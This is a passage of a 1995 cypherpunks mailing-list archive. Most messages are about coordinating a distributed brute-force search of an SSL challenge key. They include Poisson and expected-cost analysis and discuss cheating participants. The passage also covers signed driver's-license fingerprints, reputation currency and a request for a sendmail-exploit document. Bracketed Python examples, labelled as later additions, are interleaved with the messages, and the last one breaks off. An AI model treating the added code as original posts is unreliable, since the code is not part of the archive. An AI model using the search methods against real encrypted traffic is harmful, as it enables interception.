arose and it appeared to me to look like an upside-down parabola after
I plotted some points (curving up, that is). i.e. the optimum was at
the pit of the parabola, and when too few or too many requests happened,
the speed over the overall simulation was increased above the optimum.
some very ingenious readers may actually be able to locate this 
code, which I put in the public domain over 5 years ago.

--

another thing I worked on was trying to find the optimal block size
of communications protocols such as Zmodem, which generally instead
just pick arbitrary block sizes 2^n. I actually was able to attack
this problem analytically through the observations of the properties
of infinite series and calculus techniques. it is a similar problem
but the idea of contention really complicates this issue. (for what
I studied, there was only one client and one server, so to speak).

I still have this paper in Latex format and if anyone is interested
I would be happy to send it to you. it's a really nice example, IMHO,
of how if you use your brain and some mathematics, you can really
get a far more elegant approach than brute force, and know with 
much greater certainty  that what you are doing makes sense 
mathematically.

an awful lot of programmers just tend to bang on the keyboard without
thinking of the theoretical implications of their work. this is
understandable given that the theoretical implications of even trivial
programs (such as the SSL client/server interactions) can be 
mathematically extremely daunting, requiring even differential 
equations to model fairly simple pieces of code.

--

well, that is my contribution of the moment into the cypherpunk 
annals. one never knows what a little combination of boredom 
and inspiration can lead to.

--V.Z.Nuri
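
[Added example, not part of the original message and not the challenge's code: one way the "evidence" and adaptive-sizing ideas above could fit together, with per-block checksums that the server spot-checks and a linear size estimate scaled by each client's audit record. SHA-256 over a constructed challenge string stands in for the per-key computation; every name here (trial, Auditor, next_size and so on) is an assumption made for illustration.]

```python
import hashlib
import math
import random

CHALLENGE = b"constructed-challenge"  # constructed sample, not a real target


def trial(key):
    """Stand-in for the per-key computation every searcher must perform."""
    return hashlib.sha256(CHALLENGE + key.to_bytes(8, "big")).digest()


def block_checksum(start, size):
    """Checksum over the trial outputs of keys start .. start+size-1."""
    h = hashlib.sha256()
    for key in range(start, start + size):
        h.update(trial(key))
    return h.hexdigest()


def block_starts(start, count, block):
    return list(range(start, start + count, block))


def honest_evidence(start, count, block):
    end = start + count
    return [block_checksum(s, min(block, end - s))
            for s in block_starts(start, count, block)]


def lazy_evidence(start, count, block):
    """Searches only the first block and fabricates the other checksums."""
    starts = block_starts(start, count, block)
    fake = [hashlib.sha256(b"fabricated%d" % s).hexdigest() for s in starts[1:]]
    return [block_checksum(starts[0], min(block, count))] + fake


def detection_probability(n_blocks, n_fabricated, samples):
    """Chance that sampling `samples` distinct blocks hits a fabricated one."""
    samples = min(samples, n_blocks)
    miss = math.comb(n_blocks - n_fabricated, samples) / math.comb(n_blocks, samples)
    return 1.0 - miss


class Auditor:
    """Server side: spot-check evidence and size the next allocation."""

    def __init__(self, block=64, samples=2, rng=None):
        self.block, self.samples = block, samples
        self.rng = rng or random.Random()
        self.passed = {}   # searcher -> audits passed
        self.total = {}    # searcher -> audits run

    def audit(self, who, start, count, evidence):
        starts = block_starts(start, count, self.block)
        end = start + count
        ok = len(evidence) == len(starts)
        if ok:
            picks = self.rng.sample(range(len(starts)),
                                    min(self.samples, len(starts)))
            ok = all(evidence[i] == block_checksum(
                         starts[i], min(self.block, end - starts[i]))
                     for i in picks)
        self.total[who] = self.total.get(who, 0) + 1
        self.passed[who] = self.passed.get(who, 0) + int(ok)
        return ok

    def reliability(self, who):
        # Unknown searchers start at 1.0; failed audits shrink the score.
        return self.passed[who] / self.total[who] if self.total.get(who) else 1.0

    def next_size(self, who, keys_done, seconds, target_seconds):
        """Linear estimate: keys/second * target time, scaled by reliability."""
        wanted = keys_done / seconds * target_seconds * self.reliability(who)
        blocks = max(1, int(wanted) // self.block)
        return blocks * self.block


if __name__ == "__main__":
    aud = Auditor(rng=random.Random(1))
    print(aud.audit("careful", 0, 256, honest_evidence(0, 256, 64)))
    print(aud.audit("lazy", 0, 256, lazy_evidence(0, 256, 64)))
    print(aud.next_size("careful", 256, 2.0, 10.0), aud.next_size("lazy", 256, 2.0, 10.0))
```

[The spot check costs the server only the sampled blocks; detection_probability shows how quickly a partly fabricated report is caught as the sample grows.]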





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 29 Aug 95 12:55:59 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
Message-ID: <v02120d05ac692a58156d@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:56 8/28/95, Timothy C. May wrote:

>Seriously, I'm awfully skeptical that any kind of remote sensing device is
>to be placed in the breasts of women seeking enhancement. The technology
>just does not currently support small devices, though I suppose some of the
>55GG strippers could support an active transmitter (or, "transtitter").

The homepage of the horse tracking devices that I recently posted states
that the devices are 11 mm long and can be injected with a 12 gauge needle.
Even has an actual size picture of the device. Small enough to fit into a
breast implant.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 12:54:10 PDT
To: cypherpunks@toad.com
Subject: Poisson numbers for random keyspace assignment
Message-ID: <ac68b5601a0210040a9d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:03 PM 8/29/95, Damien Doligez wrote:
...
>But you fail to take into account the probability that the search will
>have to go that far.
>
>
>This is how I compute the expected cost of the random search.
>
>The probability of finding the key upon searching the k-th segment is:
>
>                  k-1
>  p(k) = (1 - 1/n)    . 1/n
>
>The expected cost is the sum of all possible costs, weighted by their
>probability:
>    ___                 ___
>    \                   \              i-1
>e =  >  i p(i)    = 1/n  >  i (1 - 1/n)
>    /__                 /__
>    i = 1..oo           i = 1..oo
...

I haven't checked Damien's notation and confirmed the results, but I have
another way of looking at it, which I think produces the same results.

Last night (but it didn't arrive at my site until moments ago, for some
reason) I wrote:

>On the positive side, let everyone simply attack the keyspace as they see
>fit, picking random parts to attack. This should not be "worse" than a
>factor of several from a "perfectly coordinated" attack. (I haven't spent
>time calculating this, but my intuition is that a random attack, with
>overlapping keyspace, is not a lot less efficiently attacked than
>attempting to arrange for no overlaps...just based on my mental picture of
>dropping line segments randomly on some interval and figuring coverage of
>the line segment.)

Here's what I meant, in more detail:

Imagine the overall keyspace to be searched as a line segment of some length:

[------------------------------------------------]

Now imagine various people randomly picking starting points and doing some
segment, depending on their compute power:

   [---]
                           [--]
 [--------]
            [------]
                                 [-]
                                   [--------]

...and so on, with the various line segments scattered randomly. Some will
overlap, meaning the same keyspace segment is being searched by two or more
people.

If the total length (summation) of these line segments is the same as the
"brute force exhaustion" of the keyspace, we can do some interesting
calculations.

For example, the "expected" number of hits per point is "1". But some
points will be hit 0 times, others will be once, twice, three times, etc.
(This is in the nature of random processes, as each line segment is random
and "independent" of what other people may have independently picked.)

The Poisson distribution fits this situation exactly, with the _actual_
number of hits computed by:

P(s;m) = (e ^ -m) (m ^ s) / s!

where s is the actual number of hits and m is the expected number. P(s;m)
is the probability of seeing s hits when m are expected.

s     m      P(s;m)

0     1      1/e, or .368

1     1      1/e, or .368

2     1      .184

etc.

That is, with the "total exhaustion" amount of computation there will be
36.8% of the keyspace left unsearched, simply because nobody's random
segments landed on this fraction of the overall segment.

If twice, three times, four times, etc. as much effort is put into it
(enough to brute force the search space twice, using nonrandom assignment),
then

s     m       P(s;m)

0     2       .135

0     3       .0498

0     4       .0183


For s = 0,  P(s;m) = e ^ -m

Several conclusions can be drawn. Here's what I conclude:

* For opportunistic attacks on keys in challenges, the odds are 95% that a
key will be found with only twice the total effort (or time) using a
totally random method of picking up keyspace to search.

* This is probably good enough. (And if one only wants to be 90% sure of
finding the key, even less effort is needed.)

* And this affects several of the "denial of service" attacks mentioned
here by others, including finding the key but not reporting it (for
whatever reasons), claiming too much keyspace, etc. This is because some of
the same regions are actually being searched two or more times.

* This of course gets rid of the assignment problems.

* If the intent is to show that keys can opportunistically be found, the
random assignment method works pretty well and is "good enough." If, for
some reason, a key _had_ to be found, then a more careful, nonrandom
assignment method would be best.

As assignment methods get better, a crossover will occur, and the random
assignment method will lose its advantages.

--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

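The line-segment picture in the message above, as an added simulation (not part of the original post): segments of random length are dropped at random starting points until their summed length is m times the keyspace, and the fraction of keys hit 0, 1 and 2 times is compared with P(s;m). The keyspace size, the segment length range and the seed are assumptions chosen for the example.

```python
import math
import random
from collections import Counter

def drop_segments(keyspace, effort, seed, min_len=10, max_len=200):
    """Scatter random segments (wrapping at the end of the keyspace) until
    their summed length is effort * keyspace; return the hit count per key."""
    rng = random.Random(seed)
    diff = [0] * (keyspace + 1)        # +1 where a segment starts, -1 where it ends
    budget = int(effort * keyspace)
    while budget > 0:
        # Segment length stands in for one participant's compute power.
        length = min(rng.randint(min_len, max_len), budget)
        start = rng.randrange(keyspace)
        end = start + length
        diff[start] += 1
        if end <= keyspace:
            diff[end] -= 1
        else:                           # segment wraps past the last key
            diff[0] += 1
            diff[end - keyspace] -= 1
        budget -= length
    hits, running = [], 0
    for delta in diff[:keyspace]:       # prefix sum turns edges into hit counts
        running += delta
        hits.append(running)
    return hits

def hit_fractions(hits, max_s=2):
    """Fraction of keys searched exactly 0, 1, ..., max_s times."""
    counts = Counter(hits)
    return [counts[s] / len(hits) for s in range(max_s + 1)]

def poisson(s, m):
    """P(s;m) = e^-m * m^s / s!, the formula given in the message."""
    return math.exp(-m) * m ** s / math.factorial(s)

def compare(keyspace=1_000_000, efforts=(1, 2, 3, 4), seed=1995):
    """One row per effort level m: (m, simulated fractions, Poisson values)."""
    rows = []
    for m in efforts:
        simulated = hit_fractions(drop_segments(keyspace, m, seed + m))
        rows.append((m, simulated, [poisson(s, m) for s in range(3)]))
    return rows

if __name__ == "__main__":
    for m, simulated, predicted in compare():
        print(f"m={m}  unsearched: simulated {simulated[0]:.4f}"
              f"  Poisson {predicted[0]:.4f}")
```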





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 29 Aug 95 13:13:01 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <ac68c16f1c021004dfea@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


This thread has more crypto relevance than some might think....

At 7:39 PM 8/29/95, Dave wrote:
>>What possible value could the LEAs get by having your thumbprint digitally
>>encoded on your driver's license?  It's not like the average cop-on-the-beat
>>is qualified to lift a fingerprint and compare it.  Even if he was, how
>>does it benefit that the fingerprint is on the license?
>>
>>This seems silly.
>
>There are devices that will electronically read fingerprints available now.  So
>with such a device, the LEO would know instantly if you were who you said
>that you were.

And it is possible with today's technology to do the following:

-- take a fingerprint

-- scan it, either linearly across some reference line (marked on the
license), or in a full 2D scan

-- have the issuing agency encrypt the resulting waveform (scan), using its
private key

-- print the resulting number on the license

Then, the validity of the license could be verified by:

-- the local checking agent (cop) takes the number printed on the license

-- runs it through the _public key_ of the issuing agency

-- gets back an analog waveform (scan)

-- can compare it directly to the actual fingerprint

This is the same scheme used by the once-extant company "Light Signatures"
as a means of foiling counterfeiters.

(A diagram makes all this much clearer...)

The scan can be done for digitized photos as easily as for fingerprints.
The point is simple: an analog signal of some sort can be "signed" by the
credential-issuing authority such that the signature can be easily checked
in the field, but not easily duplicated or forged.

Note that lottery tickets use a similar scheme. The winning number is
hashed or otherwise encrypted with a private key known only (so the theory
goes...) to the ticket-issuing agencies. This hash is also printed (at
least in some jurisdictions) on the ticket (usually in very small letters).
The winning number, which is announced and posted, cannot be used to print
up a "winning ticket" because the hash/encryption function is not known to
the counterfeiters.

A major player in this market, Scientific Games, has a printing facility
nearby my home.

I don't know if any driver's licenses have anything like this, but the
technology certainly exists, and should be coming pretty soon to all sorts
of documents.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

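The issue-and-check flow described in the message above, as an added sketch (not part of the original post and not the Light Signatures design): the issuer applies its private key to a block holding the scan, the checker applies the public key to the printed number, gets the scan back and compares it with a live scan within a tolerance. The toy key, the 64-sample scan format, the hash redundancy and the tolerance are all assumptions made for the example.

```python
import hashlib

# Toy issuer key built from two Mersenne primes so the example needs no crypto
# library. Constructed for illustration only; real keys use random primes.
P, Q = 2**521 - 1, 2**607 - 1
N, E = P * Q, 65537                     # public key, known to every checker
D = pow(E, -1, (P - 1) * (Q - 1))       # private exponent, held by the issuer

SCAN_LEN = 64     # 8-bit samples along the reference line (assumed format)
TAG_LEN = 16      # bytes of SHA-256 redundancy bound into the signed block
BLOCK_LEN = 1 + TAG_LEN + SCAN_LEN

def issue(scan: bytes) -> int:
    """Issuing agency: private-key operation on the scan; the result is the
    number printed on the license."""
    if len(scan) != SCAN_LEN:
        raise ValueError("scan must hold SCAN_LEN samples")
    block = b"\x01" + hashlib.sha256(scan).digest()[:TAG_LEN] + scan
    return pow(int.from_bytes(block, "big"), D, N)

def recover(number: int):
    """Checker: public-key operation on the printed number. Returns the
    enrolled scan, or None if the number was not produced by the issuer."""
    if not 0 < number < N:
        return None
    m = pow(number, E, N)
    if m.bit_length() > 8 * BLOCK_LEN:   # a forged number decodes to noise
        return None
    block = m.to_bytes(BLOCK_LEN, "big")
    tag, scan = block[1:1 + TAG_LEN], block[1 + TAG_LEN:]
    if block[0] != 1 or hashlib.sha256(scan).digest()[:TAG_LEN] != tag:
        return None
    return scan

def mean_abs_diff(a: bytes, b: bytes) -> float:
    return sum(abs(x - y) for x, y in zip(a, b)) / len(a)

def check_license(number: int, live_scan: bytes, tolerance: float = 4.0) -> str:
    """Field check: 'forged' if the number fails the public-key check,
    otherwise 'match' or 'mismatch' against the person's live scan."""
    enrolled = recover(number)
    if enrolled is None:
        return "forged"
    close = mean_abs_diff(enrolled, live_scan) <= tolerance
    return "match" if close else "mismatch"

# Constructed sample data: an enrolled scan, a noisy rescan of the same
# finger, and a different person's scan.
ENROLLED_SCAN = bytes((37 * i + 11) % 256 for i in range(SCAN_LEN))
RESCAN = bytes(min(255, max(0, v + (i % 3) - 1))
               for i, v in enumerate(ENROLLED_SCAN))
OTHER_SCAN = bytes((91 * i + 200) % 256 for i in range(SCAN_LEN))

if __name__ == "__main__":
    number = issue(ENROLLED_SCAN)
    print("holder        :", check_license(number, RESCAN))
    print("borrowed card :", check_license(number, OTHER_SCAN))
    print("altered number:", check_license(number + 1, RESCAN))
```

Because two scans of the same finger never agree sample for sample, the cryptographic check covers only the printed number; the comparison with the live scan is a separate tolerance test.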





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 29 Aug 95 11:48:20 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <199508290556.WAA12070@desiree.teleport.com>
Message-ID: <9508291847.AA12145@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Olsen writes
>They would not have to include an entire thumbprint.  The actual code used
>to verify fingerprints is not very large.  All that would be needed is
>enough information to ID into the "official" records and enough checksum
>type information to prevent alteration/counterfeiting.  Using magnetic media
>for this is a bit foolish as it can be changed/destroyed with the stroke of
>a magnet.  I will not say by what means I would think should suit as a
>better encoding scheme because: 1) They are not using it and 2) I do not
>want to give them any ideas.

What possible value could the LEAs get by having your thumbprint digitally
encoded on your driver's license?  It's not like the average cop-on-the-beat
is qualified to lift a fingerprint and compare it.  Even if he was, how
does it benefit that the fingerprint is on the license?

This seems silly.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Tue, 29 Aug 95 13:55:08 PDT
To: cypherpunks@toad.com
Subject: Reputation currency
Message-ID: <199508292049.NAA28906@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



From my column...
-Rishab

--====(C) Copyright 1995 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#70, 21/August/1995: Implicit transactions need money you can give away

Information is often given away at no loss to its owners,
while recipients gain, because it can be duplicated. For
some purposes, it could be paid for in money that behaved
in the same way - adding to the recipient's wealth, while
not reducing that of the donor. This money would have to
be quite unusual; but so is the commodity being traded.

Buying and selling knowledge is full of implicit
transactions. One doesn't stop to write a cheque every
time one hears industry gossip, however useful, in the
corridor. More importantly, one doesn't even need to think
about doing so. So much of the knowledge traded in the
'real world' could only be done so informally. Trade is no
less valuable for this - the world runs on the chats with
senior colleagues, the friendly advice over lunch, the
learning and experience gained from working with a client.
Formalizing it all would kill it.

That's as far as we can get with knowledge outside the
distance-eliminating domain of cyberspace. The most
promising aspects of a world with fewer geographical
impediments in the flow of information include the
translation of the gossip in a corridor to an electronic
mailing-list, the ability to be advised by friends never
seen over a virtual lunch, or to chat with a senior
colleague across continents.

But the limitations of geography had advantages. People
now begin to wonder whether they're not being cheated,
when the corridor-mailing-list can have thousands of
people. The narrow confines of office buildings provide a
sense of community, and an assurance that the consumers of
the knowledge traded there are worthy of it, being likely
producers too. But restricting access to electronic
corridors will negate their advantages, of connecting more
minds across space.

The main option being considered these days is not just
overtly tied to economics - it must be, as that's what the
knowledge trade is about - but also tangled with hard
cash, with dollars. This is not only unnecessary, much of
the time, but also harmful.

With the safe assumption of secure international digital
cash transactions in the near future, the hard-currency
solution to the electronic corridor problem would be to
charge every consumer a small amount for everything - a
cent a word, say. This may work with traders in diversity,
the indexers of the world to whom you pay for anything you
need to find. It works rather less well for the traders in
consistency, to whom you would pay much more than a cent a
word for continuous, reliable content.

But for those who lurk in the electronic corridors of the
infosphere - and all the implicit cooperatives that form
between individual contributors to cyberspace's live,
people resources - the hard cash model is useless. Among
others, there is the question of who takes the money. The
Department of Corridors? The Treasurer of Electronic
Mailing Lists? It certainly wouldn't be fair to pay just
the individual author of the particular piece you read and
found useful, as it built upon the unpaid work of others.
After all, the informal nature of these gatherings of
minds is for a reason. They, or at least the active
participants, contribute not for cash but in return for
the contributions of others. They only take exception to
the one-way consumption by stray, if numerous, visitors.

The alternative to hard cash in these implicit
transactions in cyberspace is the equally implicit
currency of the real world. The currency that is used
almost solely in the trading of knowledge and which, like
knowledge, extracts no direct cost to the buyer at the
seller's gain. A currency that can be paid equally to
corridors full of industry gossip as to colleagues who
throng there. Indeed, a currency that is, and is traded
like, information itself: reputation.

Reputation may not, at first glance, resemble money. But
it is the implicit reward of good products, and their
producers. It certainly adds to - or subtracts from - the
worth of those who receive it. And it is the ultimate free
market currency. Traded as a commodity like other data,
reputation is based on, and influences in turn, the
average of 'prices' set by individual consumers - what
individuals think of a producer. Reputation encourages
improved production as much as, or more than, cash does -
at least in the informal knowledge trade. And reputation
will be a very important aspect of the knowledge economy,
with the increasing anomie of cyberspace as e-mail
replaces firm handshakes.

There are, of course, problems with transporting the
informal reputations outside cyberspace to reputation
systems within it. But work does continue on the necessary
technologies. This progresses at a slower pace than that
on automatic cent-a-word payment systems, because
developers don't realize the importance of informality in
the information age. This will have to change - the
knowledge economy is actually a people economy, and its
most common currency should reflect that.

Rishab Aiyer Ghosh (rishab@dxm.org) is the editor and publisher
of The Indian Techonomist.

--====(C) Copyright 1995 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@arbornet.org)
--==================================================================--


----------------------------------------------------------------------
The Indian Techonomist - newsletter on India's information industry
http://dxm.org/techonomist/                             rishab@dxm.org
Editor and publisher: Rishab Aiyer Ghosh           rishab@arbornet.org
Vox +91 11 6853410; 3760335;     H 34 C Saket, New Delhi 110017, INDIA




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Tue, 29 Aug 95 10:38:03 PDT
To: cypherpunks@toad.com
Subject: Probability calculations
Message-ID: <9508291203.AA24840@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


>From: Scott Brickner <sjb@austin.ibm.com>
>% k-space         random        sequential      percent
>searched          method          method        difference
[...]
>99.9             115892899       16760439       591

But you fail to take into account the probability that the search will
have to go that far.


This is how I compute the expected cost of the random search.

The probability of finding the key upon searching the k-th segment is:

                  k-1
  p(k) = (1 - 1/n)    . 1/n

The expected cost is the sum of all possible costs, weighted by their
probability:
    ___                 ___
    \                   \              i-1
e =  >  i p(i)    = 1/n  >  i (1 - 1/n)
    /__                 /__
    i = 1..oo           i = 1..oo

        ___        ___
        \          \             i-1
  = 1/n  >          >   (1 - 1/n)
        /__        /__
        i = 1..oo  j = 1..i

        ___
        \            i-1
  = 1/n  >  (1 - 1/n)
        /__
        {(i,j) | 1 <= j <= i}

        ___        ___
        \          \            i-1
  = 1/n  >          >  (1 - 1/n)
        /__        /__
        j = 1..oo  i = j..oo

        ___                 ___
        \             j-1   \             i
  = 1/n  >   (1 - 1/n)   .   >   (1 - 1/n)
        /__                 /__
        j = 1..oo           i = 0..oo
       \_______________/   \_______________/
               n                   n

e = n

This means that if you do many random searches (with a good RNG), the
average cost of one search must be n.

Any errors in the above ?

-- Damien
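The two quantities discussed in the message above, as an added example (not part of the original post): the number of segments needed to reach a given success probability, which is what the quoted table row lists, and the expected cost e = sum of i p(i), evaluated numerically and by simulation. The value n = 2^24 segments is an assumption, chosen because it reproduces the quoted 99.9% row; the sequential mean (n+1)/2 is the standard result for a key placed uniformly at random.

```python
import math
import random

def random_segments_needed(confidence, n):
    """Smallest k with 1 - (1 - 1/n)**k >= confidence, segments drawn at
    random with replacement."""
    return math.ceil(math.log(1.0 - confidence) / math.log1p(-1.0 / n))

def sequential_segments_needed(confidence, n):
    """Segments searched in order, no repeats: a fraction of n."""
    return math.ceil(confidence * n)

def expected_random_cost(n, terms=None):
    """Partial sum of e = sum_i i * p(i) with p(i) = (1 - 1/n)**(i-1) / n."""
    terms = terms or 60 * n              # remaining tail is below e**-60
    q = 1.0 - 1.0 / n
    total, p_i = 0.0, 1.0 / n
    for i in range(1, terms + 1):
        total += i * p_i
        p_i *= q
    return total

def simulate_mean_costs(n, trials, seed):
    """Monte Carlo: mean segments searched before the key's segment is hit,
    for the random method and for the sequential method."""
    rng = random.Random(seed)
    random_total = sequential_total = 0
    for _ in range(trials):
        key_segment = rng.randrange(n)
        tries = 1
        while rng.randrange(n) != key_segment:   # redraw, repeats allowed
            tries += 1
        random_total += tries
        sequential_total += key_segment + 1       # position in a fixed sweep
    return random_total / trials, sequential_total / trials

if __name__ == "__main__":
    n = 2 ** 24                                   # assumed segment count
    r = random_segments_needed(0.999, n)
    s = sequential_segments_needed(0.999, n)
    print(f"99.9%: random {r}, sequential {s}, "
          f"difference {round(100 * (r - s) / s)}%")
    print("series value for n=1000:", round(expected_random_cost(1000), 6))
    print("simulated means (random, sequential), n=100:",
          simulate_mean_costs(100, 20000, seed=1))
```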




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Gate <gate@id.WING.NET>
Date: Tue, 29 Aug 95 11:58:05 PDT
To: cypherpunks@toad.com
Subject: Searchnet
Message-ID: <Pine.3.89.9508291310.S13049-0100000@dialin1.wing.net>
MIME-Version: 1.0
Content-Type: text/plain



	Some time ago, I posted a reply to an allegation that the 
Spotlight was a Klan paper. 

	Of course, it is more Liberty Lobby/CIA, with Bo Gritz on the Board.

	The point of this post is that those who want to know 
what is up with the Spotlight need to subscribe to Searchnet, which 
covers all the information of like sort. There was also a wonderful post 
recently hailing hackers as the ones who are most likely to prevent 
government sponsored crypto-terror censorship.

	Those who would like the post, speak up.

	Those who want to subscribe to Searchnet, likewise.

	Hope this does not get in the way of PGP implementation.

	Onwards, Lee

____________________________|||||||||||||||||||||______________________________
		 R. Leland Lehrman@The Gate, New Haven, CT.     	    
		    http://id.wing.net/~gate/gate.html
	  God, Art, Technology and Ecology Research and Development
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Do you love the Mother?>>>>>>>>>>>>>>>>>>>>>>>>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Tue, 29 Aug 95 14:56:18 PDT
To: don@cs.byu.edu
Subject: Re: Sendmail Bugs
In-Reply-To: <199508290733.BAA01311@wero>
Message-ID: <Pine.BSD.3.91.950829145429.17990A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Aug 1995 don@cs.byu.edu wrote:

> There is a document on alt.security which describes exploitable sendmail
> bugs. The reference is <809544856snz@hacknet.demon.co.uk>
> I saved a copy in case anyone would like one.

Would you please email me a copy of that doc-file?

I would find it very interesting... :-^)

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Tue, 29 Aug 95 14:01:35 PDT
To: cypherpunks@toad.com
Subject: SSL search attacks
Message-ID: <199508292102.PAA01897@wero>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Scott Brickner <sjb@austin.ibm.com>

>We've identified several forms of "real-world retaliation:"
>
>1) "Result hoarding" - failure to report a found key
>2) "Segment hoarding" - requesting more segments than one can hope to search
>3) Denial of service - preventing access to the server

>The "random search" method eliminates all three of these at about 37%
>higher cost in search time, on the average.  I submit that if we
>*really* were trying to break something important, we could design a
>system which eliminated the first two and adequately limited the third,
>but at *much* less cost.
>
>The problems in the current system were to be expected of a first
>attempt.  In the future:  Only the server assigns segments, only the
>assignee may report the status of a segment, and after all segments are
>NAKed we know condition 1 has occurred, at which time we start over,
>but never assign the same segment to the same searcher.  Limit the
>number of segments which may be outstanding with one searcher at one
>time as a function of work rate.  Deploy redundant servers.

BEAAAT STATE! Push 'em back.. WAAAAAAY BAAAACK. 
(relevant comments follow)


From: tcmay@got.net (Timothy C. May)

>An interesting question: Is it a valid approach for J. Random User to
>"claim" some chunk of keyspace to search?
>
>If the "reward" of finding the gold buried in the keyspace (a key that
>meets the  challenge) is high and the cost of claiming the keyspace is low
>(or nil), then game theory tells us that some folks will be tempted to
>claim a bigger chunk of keyspace than they can possibly process.
>
>What can be done to reduce this effect?


In regard to both messages, I think that with sequentially allocated
keyspace an attacker who knows the real key would have trouble getting the
right segment unless s/he grabbed a big enough piece. If the search is
restarted, we know something's up. Ensuring that nobody gets to search
keyspace they searched before would be one improvement. A random (instead
of sequential) allocation _by the keyserver_ (out of unallocated 
piecemeal segments) would also take some work to implement. 


>On the negative side, ostracize or punish those who bite off more than they
>can chew. This approach is fraught with dangers.

If the search wraps around to catch the UNACK'ed pieces, this type of
oversight will only slow down the actual discovery of the key. Failure
to report a found key, though, is a bit different. I would not be opposed
to having my program report possible hits, with the server being what
discovers if I've found it or not.

>On the positive side, let everyone simply attack the keyspace as they see
>fit, picking random parts to attack. This should not be "worse" than a
>factor of several from a "perfectly coordinated" attack. (I haven't spent
>time calculating this, but my intuition is that a random attack, with
>overlapping keyspace, is not a lot less efficiently attacked than
>attempting to arrange for no overlaps...just based on my mental picture of
>dropping line segments randomly on some interval and figuring coverage of
>the line segment.)

Why not have a random backup-mode, in case someone does mount a denial of
service attack? Or employ a combination of the two modes. The machines
running brloop can search sequentially (out of the middle 50%?) and the
machines not connected search randomly (out of the outside 50%?). Or,
venturing further into the I-wonder-who's-gonna-code-this world, log the
random searches for possible conversion to an exhaustive search later. 

It would be nice to be able to hit the emergency button and switch to
random mode, but currently I don't think there's a need to actually
use it.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMEN/U8La+QKZS485AQHNcgL+ItlNLYcsIjjlQPQJBxgts66GXPMs3ijb
QIcqiAbrg4cq7F9xWNRvZa9LTvw75UUM1+PmItGkSUuqOqvJ9VkzaUp8/Sf5zuDs
5XTlJLVhYa7qQzY4Ov4a3k0ora0SPvKh
=wyzo
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
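The server rules quoted in the message above (only the server assigns, only the assignee reports, restart when every segment is NAKed, never give a searcher the same segment twice, limit outstanding segments by work rate), combined with random allocation by the keyserver and server-side checking of reported hits, as an added sketch. This is not the brloop code or anything posted to the list; the class, the quota rule and the toy challenge are hypothetical.

```python
import random

class SegmentServer:
    """Keyspace server enforcing the rules listed in the lead-in."""

    def __init__(self, n_segments, verify, seed=0):
        self.n, self.verify = n_segments, verify
        self.rng = random.Random(seed)
        self.round = 0
        self.unassigned = set(range(n_segments))
        self.naked = set()     # segments reported "no key here" this round
        self.owner = {}        # segment -> searcher currently holding it
        self.history = {}      # segment -> every searcher it was ever given to
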